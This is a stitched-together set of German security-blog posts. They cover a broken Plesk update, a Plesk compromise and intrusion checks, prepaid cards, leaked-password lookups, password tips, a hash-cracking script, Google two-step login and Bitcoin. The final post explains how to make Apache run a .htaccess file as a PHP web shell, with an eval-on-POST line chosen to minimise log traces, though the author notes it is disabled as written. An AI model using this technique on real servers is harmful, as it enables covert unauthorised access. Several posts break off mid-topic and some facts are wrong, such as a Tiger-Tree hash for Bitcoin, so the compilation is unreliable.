Nach einem automatischen Update ist Plesk 10.4.4 nicht mehr zu erreichen.
Es lässt sich sowohl über die Weboberfläche unter

https:://meine-domain.de:8443

als auch über SSH nicht mehr aufrufen bzw. starten.

Was ist passiert?

Bei näherer Betrachtung der Plesk autoupdate Logfiles unter /tmp/plesk_10.4.4_installation.log

**** problem report *****

ERROR while trying to chown root:psaadm /opt/psa/admin/sbin/wrapper Check the error reason(see log file: /tmp/plesk_10.4.4_installation.log), fix and try again STOP Bootstrapper 10.13.4 post-install for BASE AT Tue Jul 17 07:07:07 BST 2012 To complete product installation one should run bootstrapper script: /opt/psa/bootstrapper/pp10.13.4-bootstrapper/bootstrapper.sh repair

sieht man, dass etwas definitiv schief gegangen ist!

Zu diesem Zeitpunkt funktionieren zwar die meisten Webseiten noch auf dem Server, doch man erkennt, weitere Probleme:

• /usr/local/psa Verzeichnis fehlt
• /opt/psa/admin/sbin/ hier fehlen Dateien z.B. der oben genannte wrapper
• Über 80% der Plesk Dateien sind gelöscht worden auf dem Server.

Ist der Fehler bekannt?

Laut Plesk ist der Fehler am 20.Juli.2012 behoben worden. Link
Hier wird bestätigt, dass es bei einem Mikroupdate zum Verlust von Plesk Dateien kommt.

Wir kann ich das Problem lösen?

Vorbereitung:

• Erstellen eines Backups der Datenbank (mySQL)

• Webseiten Daten Backups erstellen

• Mailboxen backupen.

Es wird empfohlen auf die aktuelle Version 11 zu updaten (siehe http://blog.botnetzprovider.de/2012/07/25/sicherheitlucke-plesk-und-deren-folgen/

Der Plesk Installer:

Dieser wird benötigt, um Plesk 11 auf Ihrem System zu installieren oder ggf. ein Upgrade auf Version 11 durchzuführen . Bitte beachten Sie, dass Sie den Plesk-Installer für Ihre Distribution downloaden.

Nun startet man den Plesk-Installer mit

./parallels_installer_v3.12.0_....

sollte dies nicht funktionieren, müsssen Sie die Datei noch ausführbar machen.

Dies geschieht mit

chmod +x parallels_installer_v3.12.0_....

Bitte folgen Sie nun den Anweisungen des Plesk-Installers.
Nach einem erfolgreichen Upgrade sollte Ihr Plesk wie gewohnt unter

https://meine-domain.de:8443

zu erreichen sein. Alle Ihre bisherigen Einstellungen sollten nun auch in Plesk 11 vorhanden sein. Passwörter und andere Einstellungen sind nicht verändert worden.
Sollten Sie Hilfe benötigen bei der Installation oder beim erstellen von Backups:

ITS Netzwerk Services

Unser Service umfasst:

• Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
• Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
• Langfristige Wartung und Administration Ihrer Systeme
• Angriffsanalysen und Auswertungen der Angriffe
• Bedrohungsanalysen
• Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

Angefangen hat es mit einem Angebot von einer Hacker Gruppe, die für ein paar Tausend Dollar ein 0-Day Exploit für Plesk zum Verkauf angeboten hat. Zunächst wurde es als Hoax abgehandelt, bis schließlich die ersten gehackten Server aufgetaucht sind.

Laut Plesk handelt es sich wohl nicht um eine neue Sicherheitslücke, sondern um eine alt bekannte:

No, there is no new security problems in Plesk 10.4.4. The
vulnerability is the old one. Please refer to this article in our
knowledge base: http://kb.parallels.com/en/114330

The attack could occur on patched server if:

1) passwords were stolen previously when servers had a vulnerable
version of Plesk installed. If passwords were not changed using
http://kb.parallels.com/en/113391, then attackers could use them in
order to hack servers.

2) passwords were changed using http://kb.parallels.com/en/113391, but
some end-users changed their passwords back to old ones.

Man kann sich diesbezüglich nicht 100% sicher sein, aber die Analysen laufen noch.

Im Plesk Forum wird von Administratoren berichtet, die trotz des Einspielens der Sicherheitsupdates von Plesk und das Ändern sämtlicher Passwörter in kürzer wieder gehackt worden sind. Hier stellt sich die Frage, ob die Administratoren von Anfang an nach Backdoors und neu angelegten Usern gesucht haben?

Plesk Upgrade:
Seit dem 15.Juli 2012 hat Paralles Plesk ein wichtiges Sicherheitsupdates veröffentlicht für alle Plesk Versionen (v8-10) und Plesk 11 (nur für Windows). Leider wird nicht viel zu dem Update geschrieben, nur das es als „critical“ eingestuft wird und jeder installieren muss. Link

Wie kann ich feststellen, ob mein Server gehackt worden ist?

• Produziert Ihr Server ungewöhnlich viel Traffic?
• Reagiert er langsamer als normal
• Hat Ihr Virenscanner verdächtige Dateien gefunden?

Oftmals werden von den Angreifern Cronjobs angelegt und können unter

$ ls /var/spool/cron/tabs/

eingesehen werden.
Gerne werden die Cronjobs als User www-data angelegt und rufen schadhafte Skripte auf.

Auch sollte man die Prozessausgabe „ps“ sich mal genauer ansehen, um ungewöhnliche Prozesse zu identifizieren.

Ein weiteres hilfreiches Tool zur Analyse ist „netstat“ mit dem man offene Verbindungen überprüfen kann.

Falls man mit der Analyse überfordert ist, oder nicht genau sicher ist sollte man sich professionielle Hilfe holen. Ein gehackter Server kann schnell zu vielen Problemen führen.

ITS Netzwerk Services

Unser Service umfasst:

• Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
• Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
• Langfristige Wartung und Administration Ihrer Systeme
• Angriffsanalysen und Auswertungen der Angriffe
• Bedrohungsanalysen
• Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

Leider musste ich vor kurzem wieder lesen, dass es einen möglichen erneuten Einbruch bei dem Hoster 1blu gab. Ist nun nach Hetzner auch 1blu Opfer eines Hackerangriffes geworden?

Kurz darauf kam eine weiter Hiobsbotschaft, dass bei Valve "Steam-Plattform" eingebrochen worden ist.
Nach Sony ist Valve einer der größten Gaming-Portale, mit der Möglichkeit online Spiele zu erwerben.

Kurz zusammen gefasst, gab es in den letzten Wochen mehr als einen großen Einbruch, bei dem möglicherweise Kundendaten und Kontodaten bzw. Kredit Karten Daten entwendet worden sind.

Das verunsichert uns als Kunde. Wenn man schon seinem Provider / Gaming-Portal Anbieter nicht mehr vertrauen kann, wem dann?

Daher bin ich der Auffassung, dass man sich als Kunde, mehr um seine eigenen Datensicherheit kümmern sollte. Ich versuche hier ein Beispiel zu geben, wie man zumindest die Zahlungsmethoden, etwas verbessern kann.

Da man bei der Bestellungen einer Dienstleistung keine falschen Personenangaben machen darf, muss man sich auf die Zahlungsmethoden konzentrieren. Damit man dabei auch im legalen Ramen bleibt, empfiehlt sich der Einsatz von "Einmal Kreditkarten" oder "Pre-Paid Kreditkarten"

Diese "Pre-Paid" Karten kann man anstatt seiner eigenen Kredit Karte zum bezahlen verwenden.

Dies hat einen großen Vorteil:

Sofern bekannt wird, dass es einen Hackereinbruch gegeben hat, kann man diese Karte einfach vernichten und sich eine neue Pre-Paid Kreditkarte zulegen. Ohne befürchten zu müssen, dass die Kreditkarten Nummer irgend wo im Internet zum Verkauf angeboten wird. Des weiteren spart man sich den Ärger mit seiner Bank. Dort muss man anrufen und jeden unrechtmäßige Buchung zurück fordern oder ggf. die Karte sperren lassen. Diese Vorgänge sind meistens auch immer mit weiteren Kosten verbunden.

Auch dient eine Pre-Paid Kreditkarte zur Kostenkontrolle. Dort kann nur so viel ausgegeben werden, wie man zuvor auf die Karte transferiert hat.

Sofern der Einsatz einer Pre-Paid Kreditkarte nicht möglich ist und man ein normales Konto anbeben muss, empfiehlt sich folgendes:

Heutzutage kann man ohne Probleme ein weiteres Online-Bankkonto eröffnen. Dies sollte man dazu benutzen, sich bei den o.g. Diensten anzumelden. Durch das separate Konto hat man die volle Kostenkontrolle und kann ggf. ungewollte Abbuchungen stornieren lassen. Da dieses "Zweit-Konto" nicht als Gehalts- oder Sparkonto genutzt werden sollte, hat der Hacker auch nicht die Möglichkeit, "viel" Geld abbuchen zu lassen. Auf diesem Konto sollte immer nur so viel Geld liegen, wie man monatlich für die Dienstleistungen in Anspruch nimmt.

Fazit:
Schade, dass man solche Vorkehrungen treffen muss, aber die Vergangenheit hat gezeigt, dass wir als Kunden uns mehr schützen müssen. Auf den Verkauf der einzelnen Datensätze, speziell Name/Adresse/Alter/E-Mail, werde ich hier nicht weiter eingehen. Dafür müsste man sich, in einem weiteren Artikel, mal Gedanken machen. Ich hoffe mit diesem Artikel, nicht nur die einzelnen Benutzer ein wenig zu sensibilisieren, sondern auch die Anbieter der Dienstleistungen unsere Daten separat zu speichern.

Sie haben es sich zur Aufgabe gemacht, alle veröffentlichten Pastbin / Torrent Dateien die sensible E-Mail Adressen und Passwörter enthalten zu sammeln. Auf diesem Wege werden, von Zeit zu Zeit, immer wieder "Full disclosure" Artikel veröffentlicht von Hackergruppen.

Puzic schreibt: "Ich habe versucht innerhalb von 2 Stunden so viele Daten wie möglich zu sammeln und bin auf 30.000 Benutzernamen und Passwörter gestoßen." Weiterhin schreibt er, dass wöchentlich ca 40.000 neue E-Mail Adressen und Benutzernamen dazu kommen.

Die pwnedlist.com Datenbank enthält ca 5 Millionen gehackte E-Mail Adressen und Benutzernamen. Durch die Eingabe seiner E-Mail Adresse oder Server Benutzernamen, kann man feststellen, ob diese irgendwo im Netz bekannt sind.

Auf der Webseite pwnedlist.com selber, werden keine sensiblen Benutzerdaten und Passwörter gespeichert. In der Datenbank ist lediglich der Hash zu der E-Mail Adresse / Benutzernamen gespeichert und ob diese im Netz bekannt ist. Die Datenbank gibt lediglich ein "JA" oder "NEIN" zurück, so Puzic.

Was sollte ich machen, wenn meine E-Mail Adresse dort gelistet ist?
Keine Panik! Das die Adresse in der Liste erscheint, heißt noch nicht, dass diese auch von Hackern missbraucht worden ist. Man sollte sofort das Passwort des besagten Accounts / E-Mail Adresse ändern. Natürlich sollte man auch alle seine anderen Passwörter einmal ändern, da es nicht ausgeschlossen ist, dass diese auch missbraucht worden sind. Gerne wird auch nur ein Passwort für alles verwendet, dann muss man all seine Dienste die man mit diesem Passwort geschützt hat ändern.

Die beiden Sicherheitsexperten wollen in Zukunft Updates auf Twitter veröffentlichen. Ihr Twitter Account: @pwnedlist

Die Webseite ist wieder ein gutes Beispiel, dass man verschiedene Passwörter für verschiedene Online-Dienste nutzen sollte. So sollte man für sein E-Mail Postfach ein anderes Passwort verwenden, wie z.B. für sein Ebay Account.

Wie sieht ein sicheres Passwort aus?
Ein sicheres Passwort sollte aus mindestens 9 Zahlen & Buchstaben (Groß+Kleinschreibung) bestehen. Der einfachste Weg sich ein sicheres Passwort zu merken ist, sich einen Satz zu merken und dann ein paar Sonderzeichen bzw. Zahlen hinzufügen.

Beispiel:

Satz: "Mein Hund hat die Katze des Nachbarn gebissen"

Wir nehmen nun die Anfangsbuchstaben des o.g. Satzes: MHhdKdNg und fügen am Ende noch ein "!" hinzu. Dann erhalten wir:

Passwort: MHhdKdNg!

Gerne kann man hier noch eine Zahl mit einbringen, z.B. "MHhdKdNg2011!"

Google hat im ersten Halbjahr 2011 über 6000 Anfragen bekommen, Benutzerdaten zur strafrechtlichen Verfolgung heraus zu geben. Dies geht aus dem offiziellen Bericht von Google hervor. Dies ist eine Steigerung von 29% im Vergleich der letzten 6 Monate.

5950 Anfragen waren von US Strafverfolgungsbehörden. Es wurde um die Herausgabe von über 11000 Benutzerkonten, bei Google und Youtube gebeten.

Google ist diesen Anfragen in 93% der Fällen so schnell es ging nachgekommen.

Die zweithöchste Anfrage an Google kam aus Indien mit über 1700 Anfragen bezüglich der Herausgabe von über 2400 Benutzerkonten. England hat nach Indien über 1200 Anfragen an Google gestellt.

Google ist die einzige große Internet Firma, welche einen transparenten Bericht, über die herausgegebenen Daten veröffentlicht. Was machen andere Firmen? Alles still und heimlich?

Weitere Links:
Transparency Report (raw data)

Akzeptierte Hash Werte

• MD4 - RFC 1320
• MD5 - RFC 1321
• SHA1 - RFC 3174 (FIPS 180-3)
• SHA224 - RFC 3874 (FIPS 180-3)
• SHA256 - FIPS 180-3
• SHA384 - FIPS 180-3
• SHA512 - FIPS 180-3
• RMD160 - RFC 2857
• GOST - RFC 5831
• WHIRLPOOL - ISO/IEC 10118-3:2004
• LM - Microsoft Windows hash
• NTLM - Microsoft Windows hash
• MYSQL - MySQL 3, 4, 5 hash
• CISCO7 - Cisco IOS type 7 encrypted passwords
• JUNIPER - Juniper Networks $9$ encrypted passwords
• LDAP_MD5 - MD5 Base64 encoded
• LDAP_SHA1 - SHA1 Base64 encoded

Dazu wird der Hashwert automatisch bei diversen Hash-Cracking Webseiten hoch geladen und dann gegen deren Datenbanken geprüft. Es kann natürlich vorkommen, dass der eingegebene Hashwert nicht gefunden wird. Dann ist es hilfreich seine lokalen Rainbowtables zu verwenden. Das Skript und die Rainbowtables sollten nur dazu verwendet werden, seine eigenen Passwörter auf Schwachstellen zu untersuchen.

Benötigt wird Python zum starten des Skriptes.

Beispiele:

Das Script Findmyhash.py kann man hier downloaden: LINK

Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses einmal in die falschen Hände geraten, ist der Zugriff auf das Google-Konto nicht mehr möglich. Persönliche Daten,Bilder und Dokumente sind nun verloren.

Google hat dafür eine Lösung entwickelt, mit der man eine zusätzliche Sicherheitsebene erhält. Die Zwei-Wege-Authentifizierung.

Heutzutage hat fast jedes größere Unternehmen, eine solche Ebene zur Absicherung eingerichtet. In den meisten Fällen wird ein "RSA-Token" verwendet. Nach der Eingabe des Benutzernamen und Passwort wird noch zusätzlich ein Sicherheitscode, meist in Form einer Zahlenkombination verlangt. Diese zusätzliche Form von Sicherheit bzw. Sicherheitsebene kann nur mit sehr viel Aufwand umgangen werden.

Google hat für seine Benutzer ein ähnliches Verfahren entwickelt. Mit Hilfe des Smart-Phones wird das App Google-Authenticator heruntergeladen und mit dem Google-Konto verknüpft. Eine ausführliche Anleitung auf Deutsch findet man hier:

Erste Schritte bei der Bestätigung in zwei Schritten

Bei dem einloggen in sein Google-Account, wird nun ein Bestätigungscode zusätzlich zu dem Passwort verlangt. Der Bestätigungscode wird alle 45 Sekunden generiert und kann vom Smart-Phone abgelesen werden. Wichtig: Nach der Aktivierung der 2 Wege Authentifizierung muss man immer zusätzlich den Bestätigungscode mit angeben, sonst kann man sich nicht mehr in sein Google-Konto einloggen.

Des weiteren kann man nun auch "Einmal Passwörter" für einzelnen Google-Dienste vergeben. Ein klassisches Beispiel ist, dass man seinem Smart-Phone ein "Einmal Passwort" vergibt. Im Falle, dass man sein Handy verliert, kann man nun aus seinem Google-Konto heraus die Rechte für das Handy entziehen (revoke). Damit erhält der Dieb des Handys KEIN Zugriff mehr auf das Google-Konto.

Die Anleitung für "Einmal Passwörter" findest du hier: Anleitung

!!! WICHTIG !!!
Bei der Aktivierung der 2 Wege Authentifizierung bietet Google einem 10 Notfall-Bestätigungscodes an. Diese müssen an einem Sicheren Ort aufbewahrt werden, da man im Verlustfall des Handys keine weiteren Bestätigungscodes generieren kann. Auch sollte man das Zusenden von Bestätigungscodes via SMS auf ein anderes Handy/Festnetz aktivieren, so dass man zur Not sich immer noch in sein Google-Konto einloggen kann.

Zur Zeit ist die Webseite des Hosters immer noch "offline" nur der Notfall-Blog ist online.

Bitcoins wurden 2008/2009 von Satoshi Nakamoto veröffentlicht. Es handelt sich dabei um eine digitale
Währung, über die in den letzten Monaten vermehrt in Deutschland berichtet wurde. Hier ein Artikel von Spiegel-Online "Geld aus der Steckdose" & ein Artikel von Netzpolitik.org Ich möchte auch auf den Artikel vom BVDW hinweisen "BVDW warnt Verbraucher und Händler vor Bitcoins als Zahlungsmittel"

Was macht Bitcoins so interessant?

Es ist höchstwahrscheinlich der Anreiz aus "Nichts" Geld zu machen. Bitcoins kann jeder mit seinem eigenem PC erschaffen und die aus dem Nichts erschaffenen Bitcoins sammeln und damit online handeln. Die Generierung von Bitcoins nennt man "mining". Diverse Miner stehen einem zur Verfügung, egal welches Betriebssystem man verwendet. Des weiteren gibt es keine zentrale Kontrollinstanz, z.B. eine Bank die deine Bitcoins einziehen kann oder ein Staat der Bitcoins einfrieren kann. Wir erinnern uns an die WikiLeaks-Konten, die einfach eingefroren worden wurden.

Welche Technik steckt dahinter?

Jeder einzelne Benutzer von Bitcoins bekommt eine Geldbeutel (engl. wallet) in dem er seine Bitcoins aufbewahrt. Sollte dieser virtuelle Geldbeutel verloren gehen, ist auch das Geld weg, wie im richtigen Leben. In diesem Geldbeutel befindet sich eine öffentlicher und ein privater Key. Dieser öffentliche Key dient zum Senden und Empfangen von Bitcoins.

Beispiel für einen öffentlichen Key aus einem Wallet :
1B5GxmfyJhHRDdPbXmdJDH23GfyxMoM8yPeh

Der private Key bestätigt dann die Transaktion, so dass sicher gestellt wird, dass das Geld auch angekommen ist. Durch diverse öffentliche Keys ist sichergestellt, dass keine persönlichen Daten zum Austausch der Bitcoins benötigt wird. Die Validierung von Transaktionen findet durch die Knoten des Netzwerkes statt. Bei jeder Transaktion wird der in der Bitcoin enthaltene öffentliche Schlüssel durch den seines neuen Besitzers ausgetauscht und mit dem privaten Schlüssel signiert. Über den Tiger-Tree Hash wird jede Transaktion in der Datenbank festgehalten, um
doppeltes Ausgeben zu verhindern. Das Limit für alle je existierende Bitcoins wurde auf 21 Millionen festgesetzt.

"Neue Bitcoins werden durch die Lösung komplexer mathematischer Probleme verteilt auf das Rechnernetz generiert, wobei die Obergrenze von jemals existierenden Bitcoins auf 21 Millionen (2,1 * 106) festgelegt ist, wobei jede Bitcoin 100 Millionen (108) Mal geteilt werden kann. Dies ergibt eine gesamte Anzahl von 21 Billiarden (2,1 * 1015) Einheiten. Neue Bitcoins berechnen sich durch die Formel (6 × 50 Bitcoins/Stunde) × (eigene CPU-Geschwindigkeit / Summe der totalen CPU-Geschwindigkeit des Netzwerkes)"
(Quelle: Wikipedia)

Die Anzahl an Minern ist in den letzten Monaten sehr gestiegen, so dass der Schwierigkeitsgrad dadurch erhöht wurde. Es lohnt sich heutzutage nur noch auf GPUs zu minen.

Was kann ich mit Bitcoins machen?

Es gibt diverse Anbieter die heute schon Bitcoins in US-Dollar oder andere Währungen umtauschen. Dies hat zur Folge, dass sich eine eigene Bitcoin-Börse für Bitcoins entwickelt hat.

Ist fast wie auf dem echten Parkett, volle Übersicht! Auf einen Blick die Bitcoin-Weltmärkte überblicken.

Bicoin Charts der letzten Tage

Die Bitcoin Entwicklung in den letzten Stunden. Durch ausgefeilte API's lässt es sich auch voll automatisch handeln (engl. traden)

Hier kann man Bitcoins handeln, das heißt ankaufen und verkaufen. Durch den Ankauf von Bitcoins in US-Dollar und den Verkauf in Euro kann man durch die Bitcoin Börsen Gewinne erzielen. Auch gibt es einige Internet Dienste die Bitcoins als Zahlungsmittel akzeptieren.

Was muss ich tun um auch zur Bitcoin-Gemeinde zu gehören?

1. Bitcoin Client downloaden hier

Mehr muss man nicht machen. Jetzt erhält man einen digitalen Geldbeutel (engl. wallet) und kann Zahlungen senden bzw. empfangen
anhand seiner öffentlichen Keys.




In meinen nächsten Blog-Einträgen werde ich näher auf die einzelnen Aspekte und Möglichkeiten von Bitcoins eingehen. Solltet Ihr Fragen haben, einfach kurz anmelden und die Frage stellen.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com 
# umgeschrieben von http://blog.botnetzprovider.de 

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren. 
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #